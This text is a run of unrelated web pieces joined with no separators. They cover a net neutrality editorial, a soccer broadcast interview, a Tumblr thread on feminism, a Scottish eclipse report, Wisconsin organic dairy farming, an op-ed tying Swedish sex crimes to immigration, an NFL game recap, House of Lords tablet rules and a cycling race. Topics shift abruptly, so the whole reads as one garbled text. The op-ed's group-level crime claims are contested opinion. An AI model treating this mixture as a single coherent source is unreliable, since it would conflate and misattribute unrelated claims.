The government is too afraid to say it, but the internet is a utility. The data that flows to your home is just like water and electricity: it's not a luxury or an option in 2014. The FCC's original Open Internet rules failed precisely because it was too timid to say that out loud, and instead erected rules on a sketchy legal sinkhole that was destined to fail. As the WSJ reports, the FCC has once again decided against reclassifying broadband as a public utility. To declare the internet a public utility would go against the wishes of companies like Comcast and AT&T, which don't want to be "dumb pipes." There's too much money to be made by charging everyone who uses the internet far more than what it actually costs to provide service.
Circulating a draft proposal among the FCC's four commissioners is only the first step for Wheeler; the rules would need to come to a vote, and this stands to be one of the most divisive, partisan commission votes in recent memory. Commissioners Pai and O'Rielly — staunch Republicans — would be likely to vote in favor of a pro-business policy at net neutrality's expense, while Democrats Mignon Clyburn and Jessica Rosenworcel could go the other way.
In other words, one of the most destructive technology policies in American history could ultimately be decided on a 3-2 vote.
Following the FCC's first net neutrality defeat, freshly appointed chairman Tom Wheeler said he'll "fight to preserve" the open internet, but didn't specify how he'd do it. If the latest proposal passes, the only thing Wheeler will be preserving are the interests of a few big companies that want to make the internet worse for all of us.
Chris Ziegler contributed to this editorial.
Nineteen of Atlanta United's 34 regular-season games will be broadcast on either Fox Sports South or Fox Sports Southeast. Fox Sports Southeast also broadcasts the weekly show “Atlanta United: Match Week” on Tuesdays. It will re-air today at 1 p.m., Friday at 6 p.m. and Saturday at 11 a.m. and 4 p.m. The re-airs will appear on Fox Sports Southeast.
Fox Sports South Senior Vice President Jeff Genthner took a few minutes on Thursday to discuss his expectations for Saturday's broadcast and what viewers can expect.
Questions and answers have been paraphrased for clarity and brevity.
Q: What are your expectations for this broadcast?
A: With every broadcast, we want to have excellent technical coverage of the game. The best way to describe it is to look at it in two buckets: the game and all of the content of the game.
The camera angels are down, pictures good and broadcasters who are informative and tell the story of the game — that is our core business. The sights, sounds, information to soccer fans has got to be spot on, accurate and compelling.
Second to that are the Atlanta United live pregame and postgame shows. The pregame shows are always interesting because nothing has occurred yet. We want to be entertaining and informative. What we have on the docket this Saturday is a feature on (Gerardo) Tata Martino and how he has brought instant credibility to the team with an aggressive style of play. We will also have several player features.
And we will introduce viewers to the new broadcast team of Kevin Egan, Dan Gargan and Brittany Arnold.
Postgame will be heavy on highlights, postgame interviews and as much locker room access as we can get to capture outcome of the event.
Q: Has the trio practiced together by watching and calling previously played games?
A: To my knowledge I don't think this trio has ever worked together before. It's a great question because you want to hire people of individual skills and accomplishments. You never know the chemistry until you get them together.
Q: Have you gotten a sense of their chemistry from production meetings?
A: We've had production meetings. We've broken down the philosophy of how we want to flow back and forth from Kevin and Dan, and Brittany's role.
But until you are calling a live event you can only have a philosophy. What's called will be dictated by the emotion of the game.
Q: What is the biggest expected difference between broadcasting soccer and football?
A: I think we approach every event with a similar approach. The event that occurs isn't under our control. Our job is to roll in a TV truck and capture pictures and bring in the most qualified announcers, producers and directors we can and capture the event with excellent visuals and excellent sounds.
That's how we approach the more than 700 events we produce out of our Atlanta offices.
Our job is to capture it.
The other thing for us is to really be creative in the pregame and postgame (shows).
They are different sports but we go into it with the same mentality.
What I want to make sure that doesn't get lost is a lot of people were curious why Atlanta United ended up on Fox Sports South.
The beauty of being on network is it's going to be on Fox Sports South, the same brand, same position across 5 ½ states. That means the promotion of Atlanta United will be on the Braves games in Atlanta, Hawks games in Atlanta, Grizzlies games in Memphis and Hurricanes games in Raleigh. It will be getting strong cross-promotion. Consumers won't have to hunt and peck for it where they live.
The other beauty if you can watch it on Fox Sports Go.
The ease for the consumer to understand where it is on Fox Sports South, it's on an app no matter where you live, the high cross-promotion no matter where you live is very advantageous for the team and beneficial for the fans.
Particularly for the first year of a franchise, you have to make a big first impression.
Q: Will there be any interesting uses of technology that people may not expect or not have seen before?
A: We have used super slo-mo, super high-speed slo-mo in baseball and NFL coverage. We will introduce that during the season.
With a new announcing crew and production crew, we want to make sure we deliver the core product at a high level.
We will add the perks later in the season. We will probably introduce more advanced technology for home games when it's our truck.
commarxism:
mythicalnerdfighter: commarxism: spoofd: commarxism: spoofd: got a shirt Women have always been seen as people. We are the same species, which really hinted us along that path. if you think that the shirt is actually saying that women are not people or haven't been people, then i can't tell you how wrong you are. that's not the message. it's not trying to make anyone aware that men and women are of the same species. it's talking more about women being treated as people, and argue all you want but women are not treated how humans should be. read between the lines, look a little deeper. it's a metaphor. Then, I will ask something which relates albeit only through concept rather than words. When people wear “meninist” shirts, why do feminists not look between the lines and a bit deeper to realize it's a joke? Should this not bet the same concept? They're a different kind of jokes… This shirt is sarcastic. It's saying that women are obviously people, but they are treated like objects rather than people. Meminist shirts are just making fun of feminism because the people who wear them don't give a shit about women and are obviously misogynists and/or don't actually know what feminism means. Meninists shirts are also sarcastic. The jokes on things like @meninisttweets or whatever are clear parody, it even says on the side. Meninism and meninists are not misogynic, in the same way feminists and feminism are not misandrist.
Obviously feminists are not misandrists because feminism means equality, not misandry. So called meminism is not the same as equality, it's a joke at the expense of feminists.
From what I've seen, ‘meminists' are usually the sort of people who think misandry and feminism are the same thing or are misogynistic (Obviously not including the parody blogs you seem to be referencing, which are making fun of meminists, not feminists).
Meminism is ridiculous and harmful to feminism and especially women. It started as a parody of feminism; people who wear meminists shirts basically think feminism is bullshit and 'oppresses men' (obviously not, since feminists want equality). The sort of people to wear those shirts are the same kind of people to wear 'go make me a sandwich' shirts and make sexist jokes and do these things while thinking 'look at what a lad I am, bro, down with feminism!'
(Source: cynosuror)
Friday's eclipse will not touch land anywhere across the UK, but the line of totality will pass six miles north-west of the uninhabited island of Rockall
Thousands of visitors are expected to flock to the north of Scotland and its outlying islands next week in order to enjoy some of the most complete views of the solar eclipse available in Europe.
While the line of totality for the eclipse on Friday morning will not touch land anywhere across the UK, it will pass six miles to the north-west of the uninhabited island of Rockall, west of the Outer Hebrides. On the Isle of Lewis, coverage of the sun is predicted to reach 98%.
Solar eclipse 1999 - in pictures Read more
Shetland expects to be one of the darkest places in the country, with an eclipse of approximately 97%. Sumburgh lighthouse, at the southern tip of the Mainland, will be live-streaming images of the cosmic event to the Rosemount observatory in Cornwall, where a total eclipse was viewed in 1999.
Dedicated solar eclipse cruises will be stopping off in Shetland and Orkney, with more than 2,500 passengers heading north to take advantage of the islands' dark skies and minimal light pollution.
Aberdeen is expected to be the best venue on the UK mainland to watch the eclipse, with the total coverage of the sun expected to reach 94%. Torry Battery, east of the city and usually a location for dolphin spotting, is being recommended as the best place for viewing with its unspoilt views of the harbour and North Sea.
Professor John Brown, Scotland's astronomer royal, urged all eclipse-watchers to take the necessary safety precautions but added: “People think that there's something especially dangerous about the eclipse, but it's very silly to look at the sun at any time.”
Before advances in telescope technology, Brown explained, eclipses offered rare opportunities to examine the rim of the moon or examine stars. “In terms of research forefronts, eclipses are less important these days, but people are still impressed that we can predict these events with such precision,” he said.
“The sky operates like clockwork. And it is still a magical thing to see the sun vanishing. The sky does some amazing things.”
Video (39:40) : Minnesota's neighbor has the most organic dairy farms of any state
The pink had disappeared from the darkening sky, but the barn on this dairy farm radiated a warm light. Inside, the brothers worked in silence — wiping, tugging and readying the udders.
They milk these cows each day, twice a day. But it's a ritual Jim and Alan Ideker don't take for granted.
The brothers moved from Minnesota to this western edge of Jackson County five years ago to milk a mentor's organic dairy herd. Since then, they've amassed 132 of their own Holstein cattle, fed from a patchwork of 450 acres they rent, till, pasture and harvest.
“If we were going to work hard, we wanted to work hard for ourselves,” said Alan Ideker, 24, pulling on the brim of his baseball cap.
The Idekers have relied upon organic neighbors for advice and, on occasion, a rotary hoe. They're not hard to find here. Thanks to its hilly terrain and long history of organic institutions, including the now-international Organic Valley, based in little La Farge, southwest Wisconsin has become the organic farming capital of the Midwest and, by some measures, the country.
Alan Ideker attached the milking machine to one of the Holsteins in his herd last week. Ideker and his brother Jim Ideker, at top, sell their milk through Organic Valley and have worked closely with the many other Organic Valley farmers in the area to get going.
The state claims the second-highest number of organic farms, after only California, according to the U.S. Department of Agriculture. In 2008, the most recent year available, it was No. 1 in organic dairy farms.
“I joke that I'm a blue-sky salesman, telling people how organics are great, you should go organic,” said George Siemon, chief executive officer of Organic Valley. “That's one thing, but when their neighbor does it — and it works — it's a whole other conversation.”
Few row crops here
The state's organic past is part hills, part happenstance.
Organic farms are clustered in the state's southwest, census maps show, particularly the Driftless Region, an area that escaped being flattened by glaciers. Those dramatic hills make the land “less conducive to conventional farming” and row crops, said Erin Silva, associate director of the Center for Integrated Agricultural Systems at the University of Wisconsin.
The region “has a history of small farms and grazing, which are cornerstones of organic practices,” she said.
Each small city seems to have an organic operation bigger than its population might suggest. Viroqua, population 4,362, sustains the expanding Viroqua Food Co-op, which had $5.5 million in sales in 2011, and the Midwest Organic Services Association, a nonprofit that certifies more than 550 organic dairies across the country.
Spring Valley, pop. 1,352, is home to the Midwest Organic and Sustainable Education Service, which draws thousands to its annual conferences. In Westby, pop. 2,200, the century-old Westby Cooperative Creamery started offering organic options in 2011.
Then there's Organic Valley, the world's largest organic cooperative, which has grown up in La Farge, pop. 746.
“There was no magic to La Farge,” Siemon said. Just an old creamery for sale. Soon, the cooperative was renting out “every little hole in the wall in town here,” he said Now, its headquarters — with modern, angular wings anchored by a red, barn-shaped center — sits on a hill above town, flanked by solar panels.
The farmer-owned cooperative started in 1988 with 57 farmers. By 2012, it counted more than 1,800 farmers in 35 states and three Canadian provinces. Southwest Wisconsin accounts for 324 of those.
From the beginning, Organic Valley's mission has been about more than organics, Siemon said over salad and bread pudding in the headquarters cafeteria. “It was also about how to make family farms viable.”
Today that mission is even more urgent. With high land and feed prices, “the family farms of the Midwest are having to decide whether to get bigger, go organic or quit,” Siemon said. “It's that crystal clear now.”
Organic food sales swelled 10.2 percent in 2012 — the first double-digit growth since 2008, according to the Organic Trade Association. Meanwhile, conventional food sales rose 3.7 percent. Organics are still a small slice of the total food market, making up just 4.3 percent. But that's grown from 2.5 percent in 2005.
Rethinking ‘voodoo'
A four-day-old calf, so new that he hadn't yet earned a nickname, poked his nose through the red fence separating him from his neighbor, a smaller, female calf tagged No. 110.
The Ideker brothers decided to raise dairy cows organically only because of the higher, more stable price their milk would fetch. But now, it's also about these calves.
As a home-schooled teenager, Jim Ideker worked on his great uncle's beef farm. Then with 60 dairy cows on a neighbor's farm. After that, with 120 beef cattle and 120 dairy. All were raised conventionally. The brothers had no interest in organic, which restricts hormones and antibiotics and requires at least 120 days on pasture. Organic cows also produce less milk.
They equated the word “organic” with “voodoo.”
“We wanted nothing to do with it,” Jim Ideker said as Alan nodded. “We'd talk about it like it was a farce.”
Then they took a Farm Beginnings course with the Minnesota-based Land Stewardship Project and met Paul Olson, who owned an organic dairy farm near Taylor, Wis., and needed help while he worked as board chairman of the National Farmers Organization.
Now, the Idekers are believers. Very few of their calves die, Jim said. Their mothers, too, are healthier, able to get pregnant more often. All that helps with their bottom line.
“Our vet is here a third of the time they've been on a conventional farm,” he said. “You don't need all the drugs once you do it right to begin with.”
While some organic farmers have struggled in recent years to find and pay for grain that's grown without pesticides, the Idekers have harvested their own.
Wisconsin farmers are more likely to grow organic field crops, including barley and hay, to feed their livestock, according to a 2012 report by the Center for Integrated Agricultural Systems.
“Homegrown feed grains and forages help make Wisconsin's organic dairy farms more profitable than their counterparts in other parts of the U.S., where most of those inputs are purchased,” the report says.
Handing it off
Up a sloping, curved road and atop a hill sits the Wedeberg farm, an Organic Valley sign beside the driveway.
Jake Wedeberg, 28, and his older brother John is the fifth generation to farm this land. Their father, Jim Wedeberg, is one of the seven organic farmers that founded CROPP Cooperative, the co-op behind the Organic Valley brand, and now works as its dairy pool director. So it's largely up to the brothers to till, bail, haul and milk.
Jake studied engineering at the University of Wisconsin, Platteville — paying for tuition partly by growing butternut squash — and then worked at the Organic Valley offices. But he missed the farm. So about a year ago, he returned full-time.
“It's great to be self-employed, to work on your own projects,” he said. He knows he's lucky to have grown up on a farm, now 310 acres. “That's a huge capital expense we don't have to worry about.”
Partly because start-up and overhead costs for dairy are high, advocates say future growth in organics will depend on older farmers handing off their operations to the next generation, whether it be their children, such as the Wedebergs, or folks looking to join in, like the Idekers.
After midday chores at the farm, the Ideker brothers drove their blue Buick through Taylor to an old white farmhouse they're renting. “The mansion,” they joke.
In a wood-paneled office, Jim Ideker grabs a thick folder labeled “Farm Building Papers.” Inside: blueprints for a new free stall parlor to go up in spring that will allow them to double their herd. They smile whenever they mention the plans.
“Once we get that facility, we'll have the right conditions,” Jim Ideker said, plus “the feed quality, the land base and the cow genetics to perform.”
Sweden prides itself on being a beacon of feminism. It has the most generous parental leave in the developed world, providing for 18 months off work, 15 of which can be used by fathers as paternity leave. A quarter of the paid parental leave is indeed used by men, and this is too little according to the Swedish government, which has made it a political priority to get fathers to stay at home longer with their children.
Sweden has never ranked lower than four in The Global Gender Gap Report, which has measured equality in economics, politics, education, and health for the World Economic Forum since 2006. Of all members of Parliament, 44 percent are women, compared to 19 percent of the United States Congress. Nearly two-thirds of all university degrees are awarded to women. Its government boasts that it is the “first feminist government” in the world, averring that gender equality is central to its priorities in decision-making and resource allocation.
But while Swedish women rank among the most equal in the world, they increasingly fear for their physical safety on the streets. Reported sex crimes increased by 61 percent between 2007 and 2016. Meanwhile a rise in gang violence among men–the number of victims injured by gunshots increased by 50 percent between 2004 and 2016–indirectly affects the safety of women. Police admit that rape cases are piling up without being investigated because resources are being drained by gang violence and shootings.
In June, a 12-year-old girl in the small town of Stenungsund reported that she had been dragged into a public restroom and raped by an older boy. Six weeks later the girl had still not been questioned by the police. Even though she believed she had identified the perpetrator, the police had yet to pay him a visit.
“We have so many similar cases,” a spokeswoman of the local police told the Swedish public television channel SVT on September 12, “and there are so few of us, that we simply don't have the time.” She continued: “We have rape victims three years old,” and even their cases await investigation. Torgny Söderberg, head of the investigation section at the Stockholm police, confirmed the problem on SVT, acknowledging that homicides and attempted homicides draw resources away from rape investigations. “It's hard to explain why rape cases are piling up awaiting investigation, but the other crimes are even more serious. We are forced to choose between two evils.”
In August of 2016, a woman reported that she had been victim of a gang rape involving ten men in Fittja outside Stockholm. Several suspects were identified early on through forensic evidence and yet it took almost a year until any arrests were made. “I work with rape cases daily, and this is one of the worst rape cases I've ever seen,” the victim's lawyer, Elisabeth Massi-Fritz, told me. “My client has been subject to immense, psychological trauma that will remain with her for the rest of her life. It was nothing short of torture.” And yet, the suspects walked the streets for months before the police found the time to make arrests.
“Unfortunately, the police were too busy and lacked the resources to work the case thoroughly until this spring. Then a number of people were arrested in June,” explained the prosecutor, Markus Hankkio. Ten suspects have now been identified, and the trial will likely begin in October. Over a year after the suspected gang rape, police are now admitting that the same men may have committed more rapes while the police were too busy to investigate this crime, and they are urging other victims to come forward.
Another infamous case in the city of Uppsala became known as the ”Snapchat rape.” Two men filmed their rape of a young girl in real time and then uploaded the video clip to the Snapchat app. Another girl saw the clip, saved it and told her mother, who then alerted the police. It was two months before she was contacted by investigators. “It was terrible, because what you saw in that film, it was the most disgusting thing I've ever seen. And that it was so widely spread, and then that they didn't get arrested,” the mother told SVT. The two suspects were at long last arrested and convicted of rape, but recent statistics show that this is a rare exception to the norm in Sweden. In 2016, only eleven percent of reported rapes were prosecuted, a decrease from twenty percent in 2014.
For more than a decade, the prevailing perception in Sweden has been that rapes and other sex crimes have not become more frequent in spite of data that suggest the contrary. Instead, rising numbers of reported rapes have been dismissed as an effect of a broadened legal definition in 2005 and 2013, and an increased propensity among women to report crimes. Paradoxically, growing rape numbers have thus been used as proof of Swedish gender equality.
There are, however, reasons to think that there may indeed be a real increase in sex crime. While precise numbers are hard to come by, surveys of victims indicate that the share of women in Sweden stating that they have been victims of sex crime has grown rapidly. Self-reported sex crimes doubled between 2012 and 2015, from 1.4 to 3 percent of the female population. The number of women reporting that they feel unsafe in their own neighborhood has increased to almost one in three—an “alarming” development according to The Swedish National Council for Crime Prevention (Brå), a government agency.
Previous studies (by now more than a decade old) have shown a large overrepresentation of immigrants, particularly from patriarchal societies in the Middle East and North Africa, among the suspects of sex crimes in Sweden. Overrepresentation of immigrants has been even higher when it comes to group rapes, especially with three or more assailants. According to an official study from 1996, immigrant males were 4.5 times as likely as Swedes to commit rape. Immigrants from Algeria, Libya, Morocco, and Tunisia were particularly overrepresented, being more than 20 times as likely to commit the same crime. In total, 53 percent of rape suspects were either first or second generation immigrants.
A similar study, conducted in 2005, showed an even higher overrepresentation of immigrants among sex crime suspects, by then up to 5.1 times as likely as Swedes to commit rape (see pages 70-77 for a summary in English). In the 2005 study, Brå explained the growing over-representation with reference to demographics and immigration: “[T]he number of people in Sweden belonging to the group of refugees, which have in earlier studies been shown to have an especially high propensity to commit crime, has increased.” It is a plausible hypothesis that the same mechanism is at work now.
During the recent migration crisis, Sweden took in more refugees per capita than any other country in Europe. However, the exact link between sex crimes and immigration is not known, since the Swedish government will not update its statistics, and the data, which are still being collected, have not been made available to the public. In an interview with the Swedish evening tabloid Expressen on February 25, The Minister of Justice, Morgan Johansson, said that the facts are available in the 2005 study, and that no update is necessary.
But since 2005, Sweden has absorbed a large influx of refugees from the overrepresented regions in North Africa and the Middle East. If overrepresentation has not changed dramatically since this last survey, it is reasonable to infer that immigration has contributed to the increase in reported sex crime. The figures may thus actually convey, not a feminist success, but a failure to protect women's safety.
But open discussion of this subject is thwarted by taboos. Xenophobic movements in and outside Sweden use immigrant rapes as a political weapon to generalize about immigrants, which has made it an understandably sensitive topic. This has added to concerns that multiculturalism is tarnished and created a dilemma for Swedish politicians confronted with a choice between progressive orthodoxies about the benefits of multicultural diversity and the feminist duty to ensure female welfare and safety.
Elisabeth Massi-Fritz, the lawyer who represents the victim of the mass rape in Fittja,
vented her frustration in an Instagram post on October 6:
Reported rapes are increasing and on my desk I have many rapes and group rapes. A majority of the suspects that I meet in these cases are of foreign origin. I don't know if it is a coincidence that I get these cases? To find out, my colleague called Brå to get a hold of correct statistics, in order to spread information and knowledge. I don't know the figures. Brå doesn't have them either, because there are no such statistics? I thought I didn't hear them right. If we are to work preventively and stop rape, it is time to find out who the perpetrators are.
What we do know from a recent police report is that there is a significant overrepresentation of immigrants when it comes to a growing phenomenon of group harassment of women in public spaces, such as music festivals and public swimming pools. “The suspects of crimes carried out by a large group of offenders, in public, were mostly people with foreign citizenship. Regarding crimes reported in public swimming pools, the alleged perpetrators were mainly asylum seeking boys,” according to a report issued by police last spring. Similarly, a study from 2014 shows that, of men suspected of rape outdoors in Stockholm between 2008 and 2009, two-thirds were foreign nationals.
Meanwhile, police are busy dealing with rising gang crime. That the police lack sufficient resources to protect women and are prioritising other types of crime has been the subject of harsh recent criticism by feminists in Sweden. According to official government statistics, shootings have increased, especially in so-called areas of “social exclusion” – i.e. immigrant areas marked by high unemployment, welfare dependency, and crime. In these areas, reported shootings as a proportion of population are five times higher than in the rest of Sweden.
A 2014 report by economist Tino Sanandaji shows that the number of areas of social exclusion grew from three in 1990, to more than 180 in 2012. Using a different measure, the Swedish police has identified 61 so-called ”vulnerable areas,” where crimes are significantly affecting the communities. In June, Sweden's chief-of-police, Dan Eliasson, appealed to both local communities and government authorities to assist the police in dealing with these vulnerable areas. “Help us, help us!” he famously exclaimed at a press conference.
While certain types of crime, such as manslaughter and car theft, have declined over time, recent studies show that Sweden has four to five times as many fatal gun crimes as Norway and Germany. Between 2014 and 2016, police authorities handled more than 100 cases involving hand grenades, an astonishing figure that makes Sweden stand out among countries not at war.
Such levels of gang violence are without parallel in Sweden's modern history. And with police busy dealing with gang murders and shootings, rape victims wait for justice.
Paulina Neuding is a Swedish journalist and political commentator. She is a columnist with the Swedish dailies Svenska Dagbladet and Göteborgs-Posten, and her work has appeared in The Jerusalem Post, Die Welt, Project Syndicate and the Weekly Standard, among others. She lives in Stockholm, Sweden.
Share this: Tweet
Email
Print
Under the bright lights of a Sunday Night Football national broadcast, the Redskins defeated the Green Bay Packers 42-24 in a dominating offensive display. With the win, the Redskins improve their record to 6-3-1, and kept pace in the competitive NFC East race. With the loss, the Packers fell to 4-6 and were dealt a crushing blow to their playoff hopes.
Given Green Bay's stretch of late, this was a tremendously important game for the visitors, who entered the weekend on the wrong side of .500, losers in four of their last five contests. They came to Landover fresh off an embarrassing 47-25 loss to the Tennessee Titans, and still trail behind the Vikings and Lions in the tight, but winnable NFC North division.
The contest had tremendous meaning for the Redskins, as they to sought to excise past demons: to defeat Green Bay after falling to them in the divisional round of the 2015 playoffs, and to shift the narrative away from their historical inability to win in primetime games. Over Washington's last sixteen attempts in such contests, they have only recorded three victories. With wins earlier in the day by the Cowboys and Giants, the Redskins sought to hold serve and not fall any farther back in the division standings as the final stretch of the season looms on the horizon.
With the wind swirling and the temperature hovering just above freezing at kickoff, both teams struggled to get things going offensively, as each of the first three possessions ended with three-and-outs, two by the Packers and one by the Redskins. Finally, after picking up three first downs on their second drive of the game, the Redskins were forced to punt and the Packers then turned the ball over on downs once again.
After the first eight minutes of the contest, Green Bay still had only picked up two total yards of offense. It was also the first time since 2010 that the Packers had not picked up a first down over their first three drives, and also the first time in Aaron Rodgers' career that that the Packers have gone 3-and-out on their first 3 drives of the game.
On their third offensive possession, the Redskins showed a little more get up and go, with a mix of run and pass, capping off a 8-play, 55-yard drive with Kirk Cousins connecting with DeSean Jackson down the middle of the field for a 17-yard pitch-and-catch to give Washington the 7-0 lead with 2:56 left in the first quarter. The score was just Jackson's second of the year.
Touchdown #Redskins to DeSean Jackson on a sick post-route!! Kirk Cousins looking sharp early in this game vs #Packers #HTTR #WASvsGB pic.twitter.com/5ppGM7E0k0 — Samuel Gold (@SamuelRGold) November 21, 2016
To start the second quarter, the Packers were aided by a hand to the face penalty on Bashaud Breeland on 3rd down, (a penalty committed 30 yards away from the action of the play…) to extend their drive inside the Washington 35-yard line.
On 4th and 2 Rodgers kept it on the ground and extended the drive into the redzone. Facing a 3rd-and-goal on their 17th play of the drive, following a Ty Montgomery touchdown that was called back due to a holding call, Rodgers connected with Jordy Nelson for what was somehow ruled a catch in the back of the endzone. The touchdown capped off a 75 yard drive that lasted 8:29, and brought the teams even at 7 apiece.
I don't know, you tell me.
The Redskins promptly went three and out, putting a tired defensive unit back out on the field. Following a first down catch by James Starks, Josh Norman was whistled for delay of game for spiking the football in frustration after not being granted a fumble recovery. The penalty was Norman's 11th of the year, the most of any player in the NFL.
The defense stood up strong as Ryan Kerrigan was left unblocked and picked up a third down sack at the 20-yard line, his 8th of the season.
#Redskins threaten with double A-gap blitz freeing Ryan Kerrigan on the edge for his 8th sack on the season #HTTR#WASvsGB pic.twitter.com/8FekQtZ5kF — Samuel Gold (@SamuelRGold) November 21, 2016
The Packers were held to a 36-yard Mason Crosby Field goal to take a 10-7 lead with 3:37 left in the first half.
Washington sought to respond, and Kirk Cousins found Jordan Reed down the middle of the field for a 26-yard gain, followed by a Rob Kelly run to the Packers 37, to get to the two-minute warning. Out of the break, Reed picked up back-to-back catches to advance to the 18-yard line. After a Jamison Crowder catch, Rob Kelly marched up the gut off the back hip of Shawn Lauvao in for the score.
Washington went for two, but Chris Thompson's run up the middle was stopped short. With 39 seconds remaining in the first half, Washington regained the lead, 13-10. On the drive the Redskins spanned 8 plays and 75 yards over 2:58.
The Redskins out-gained the Packers 171 to 127 yards in the first half, though Green Bay dominated time of possession 18:04 to 11:56.
A Jordan Reed 38-yard catch moved the ball into Packers territory on Washington's opening drive of the second half. After moving inside the 20-yard line, Cousins was brought down by Julius Peppers for the sack, setting up a Dustin Hopkins 37-yard field goal to bring the lead to 16-10.
On the ensuing kick off, the Packers return unit let the ball thud at the two-yard line, and for a Richard Rodgers sprawling recovery the Redskins nearly could have scored off the mistake.
After nearly pinning the Packers back along their goal line, Rodgers continued his impressive day, finding Jared Cook for 47 yards into Washington territory.
Once again, the defense bent but did not break as they forced Mason Crosby to attempt a 36-yard field goal that was pushed wide left due to the windy conditions, and the Washington lead remained 6 with 5:34 left in the third.
On 3rd and 11 from the Packers 44-yard line, Cousins once again came through in the clutch and delivered another dart down the center of the field to Jamison Crowder for the score, another failed two-point conversion left the score at 22-10 with 2:00 left in the third. The drive spanned 7 plays, 74 yards over 3:34 of play time.
On the first play of the 4th quarter from the Redskins 31-yard line, James Starks found himself all alone in the flat and a blown coverage let him walk in untouched down the sideline to make it a one score game. Crosby's extra point made it 22-17.
Not to be outdone, Cousins started the next drive by quickly going over the top to -- where else? — down the middle of the field, this time to Pierre Garcon for 70 yards. Jay Gruden opted to send on the kicking unit to attempt the PAT, and Dustin Hopkins made it 29-17 with 14:25 remaining in the contest.
On the play, Kirk Cousins topped the 300 yard mark for the 17th time of his career, passing Sonny Jurgensen for the most 300-yard games in franchise history.
Poor tackling by Donte Whitner allowed Randall Cobb to spin off the hit on 3rd and 13, as he advanced 47 yards down in the Washington territory. Rodgers capped off the drive with a slant pass to Jared Cook on 1st and goal from the 6, as the Packers brought it back to within 5, 29-24 with 10:04 left in regulation.
With 6:22 left on the clock, facing a 4th and 1 from their own 41-yard line, and up by just five points, Jay Gruden opted to roll the dice and had Kirk Cousins go for the QB sneak up the middle. The gamble paid off as Cousins moved the sticks and allowed the offense to eat up valuable time while giving the defense a rest. Facing a 3rd and 7 from their own 47-yard line, the Cousins' Coming Out Party continued as he stretched the field and connected with Jamison Crowder for 53 yard gain, all the way down to the Packers half yard line.
SO clutch!
On 3rd and 7...@KirkCousins8 drops another dime to Jamison Crowder.
53 YARDS. #GBvsWAS https://t.co/MoE6LPiu7s — NFL (@NFL) November 21, 2016
Robert Kelley picked up his second score of the night to cap of the 81-yard drive. Hopkins doinked the ball of the right upright for the 12th missed extra point of the day across the NFL, but the Redskins led by 11, 35-24 with 3:54 remaining.
The Packers began to threaten several short passes with long runs, marching down to the Washington 28, but Josh Norman stripped Cook and Will Compton pounced on top of the ball for the first turnover of the day for either team.
that Josh Norman punch >>> pic.twitter.com/d2KjkmJGnO — Danny (@recordsANDradio) November 21, 2016
Kelley took it in between the tackles for 68 yards against an injury depleted interior defense, then cut back on first and goal from the four, picking up his third rushing score of the game and to salt away the victory.
Daniel Snyder dancing to 'Jump Around' pic.twitter.com/7sjkI0Xbvo — Danny (@recordsANDradio) November 21, 2016
Washington's offense extended their streak of going over 300 yards in 14 straight games which matches their stretch from 2012-13. Additionally, they have now churned out five consecutive 100-yard games on the ground for the first time since a five-game stretch that extended from the end of the 2014 season to the beginning of 2015.
Also impressive was the 10/15 stat line on 3rd and 4th downs, while recording 29 points in five redzone attempts -- two areas that the team has been in need of improvement over the past several weeks.
Kirk Cousins finished 21/ 30 for 375 yards with 3 touchdowns and 0 interceptions. On the night, he also became the sixth quarterback in team history to record back-to-back 3,000-yard seasons (Sonny Jurgensen, 1966-67; Joe Theismann, 1983-84; Mark Rypien, 1991-92; Jason Campbell, 2008-09; Robert Griffin III, 2012-13), and the seventh quarterback in Redskins history to pass for 10,000 yards
Leading the receivers was Pierre Garcon who racked up 6 grabs for 116 yards and a score. He tallied a number of new record marks, extending his streak of consecutive regular season games with a reception to 95 — the sixth-longest active stretch in the NFL, became the become the 15th player in Redskins history to post 20 touchdown receptions with the team, and also became the 11th player to record 4,000 receiving yards as a member of the Redskins.
Pierre also clearly had some strong feelings about dairy-based headwear:
Fam... the cheese head did NOTHING to you pic.twitter.com/FiBq165pVn — Tony X. (@soIoucity) November 21, 2016
The House of Lords will allow iPads and other tablets in official proceedings - but not laptops, over fears typing would be distracting.
The Lords approved a one-year trial of "electronic handheld devices" to access documents related to official business, but preserved a ban on laptops.
The trial will only let devices be used to read documents, not to search the web for more information.
Baroness Harris said an iPad would be more "proper" than noisy laptops. "The point about an iPad is that it is silent; there are no clicking noises. It is quite small and can be held easily in one hand," she claimed.
Asked whether netbooks would be allowed, Committee chairman Lord Brabazon admitting he wasn't sure he knew what a netbook was, and the Lords eventually decided the rules came down to "whether they click or not" when being used.
The point about an iPad is that it is silent; there are no clicking noises
The chairman stressed that the frequent use of the iPad in the report was not due to any favouritism of the Apple device. "I use the expression 'iPad' in the same way that one uses the expressions 'Hoover' or 'fridge'," he noted.
Admitted Apple fan Baroness Harris added that laptops were "old fashioned", but said the Lords' current lack of technology was worse.
"Our devolved Parliaments and Assemblies use laptops, although they are old-fashioned now," she said. "While watching them use that technology, I felt that we were very disadvantaged."
Not conducive to good debate?
While the motion was passed, a few Lords shared concerns tablets would distract peers. "I must confess that I do not Google, Twitter, tweet or blog, nor do I have any particular desire to do any of those things, but it seems to me that to have handheld devices in the Chamber is not conducive to good debate and intelligent participation in it," argued Lord Cormack.
He raised concerns it would be impossible to enforce rules around web access. "Therefore, anybody sitting in this Chamber with a handheld device could do anything from Googling facts to getting in touch with his bookmaker."
We hear some speeches made in this noble House where perhaps playing Scrabble on our devices would be a better alternative
Lord Deben countered: "We hear some speeches made in this noble House where perhaps playing Scrabble on our devices would be a better alternative."
Others were worried Lords would appear to those watching on television to not be paying attention while fiddling with gadgets. "At least it would prove that those noble Lords were awake and not asleep," answered Lord Brabazon. "It would look no worse than that."
Baroness Harris said she would still make her speeches from paper. "I am a bit old-fashioned and the thought of standing up and referring to notes on my iPad is not very encouraging," she added. "I am old-fashioned enough to say that I will still be using paper, as many of your Lordships do in any case."
Lord Deben disagreed: "Perhaps I may suggest also that making a virtue of being out of date is really not helpful for this House."
While arguing in favour of better use of technology, Lord Lucas summed the whole debate up nicely, saying: "I am grateful to my noble friends for making me feel, for the first time in a while, that I am a member of the younger generation."
A sunny but painfully cold day – a quick summary of today's race. Sandy courses always offer a good spectacle and I remembered that I really liked this course last year, so I was looking forward to todays race and didn't even mind the 4am start. What I left out of the equation was the cold. My fingers were positively cold by the end of the day
For me, the two Vicious Velo girl's performance stood out. They are amateurs – in the best possible meaning of the word and yet Delia Beddis finished 11th while Claire Beaumont finished 19th. Not too shabby if we consider that they don't do this for a living.
